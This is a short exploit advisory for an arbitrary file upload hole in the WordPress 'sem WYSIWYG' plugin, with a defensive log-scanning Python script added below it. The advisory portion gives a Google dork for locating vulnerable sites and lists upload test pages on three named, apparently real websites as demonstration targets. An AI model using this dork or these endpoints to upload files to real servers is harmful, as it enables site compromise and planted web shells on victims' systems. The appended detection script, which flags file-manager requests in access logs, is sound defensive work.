WordPress SEM WYSIWYG third party plugin suffers from an arbitrary file upload vulnerability.
1ddc7c8afb93cc85e341c6cbe1c4f7255d215e0e0ebf1dd65c68205fef8a6cfb
# Exploit Title: WordPress sem WYSIWYG Arbitrary File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/sem-wysiwyg/
# Date: 08/22/2012
# Author: Crim3R
# Tested on: all
==================================
D3m0:
http://www.anotherdailydose.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
http://embraceorerase.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
http://www.operadepot.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
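
A defender-side check for the exposure described above, added here and not part of the original advisory: it scans web server access logs for requests under the plugin's FCKeditor file manager directory, which appears in the advisory's URLs. The log lines, client addresses and the `EXAMPLE` endpoint name are constructed placeholders, and the common/combined log format is assumed.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Directory taken from the URLs in the advisory (FCKeditor file manager bundled with the plugin).
FILEMANAGER_DIR = "/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/"
# Common/combined log format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})\b')

def canonical_path(target):
    """Normalise a request target so encoded, padded or mixed-case paths still match."""
    path = target.split("?", 1)[0]
    for _ in range(2):                      # undo single and double percent-encoding
        path = unquote(path)
    path = re.sub(r"/+", "/", path.replace("\\", "/"))
    return normpath(path).lower()           # resolves "." and ".." segments

def classify(method, path, status):
    if method in ("POST", "PUT"):
        return "write-attempt" if status < 400 else "write-blocked"
    if path.endswith("/test.html"):
        return "test-page-probe"
    return "filemanager-access"

def find_filemanager_hits(lines):
    """Return (client, method, path, status, kind) for requests under FILEMANAGER_DIR."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                           # skip malformed or non-HTTP lines
            continue
        client, method, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = canonical_path(target)
        if FILEMANAGER_DIR in path + "/":   # also matches WordPress installed in a subdirectory
            hits.append((client, method, path, status, classify(method, path, status)))
    return hits

# Constructed sample log lines (documentation IP ranges; EXAMPLE is a placeholder endpoint name).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2012:10:00:01 +0000] "GET /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2310',
    '192.0.2.10 - - [22/Aug/2012:10:00:09 +0000] "POST /blog/WP-Content/plugins/sem-wysiwyg/fckeditor/editor/%66ilemanager/connectors/EXAMPLE HTTP/1.1" 200 120',
    '198.51.100.7 - - [22/Aug/2012:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [22/Aug/2012:10:02:30 +0000] "POST //wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/EXAMPLE HTTP/1.1" 403 199',
    'not an access-log line',
]

if __name__ == "__main__":
    for hit in find_filemanager_hits(SAMPLE_LOG):
        print(hit)
```

A `write-attempt` that returned a 2xx or 3xx status is the entry to triage first; any hit at all means the file manager directory is reachable from the web and should be removed or blocked at the server.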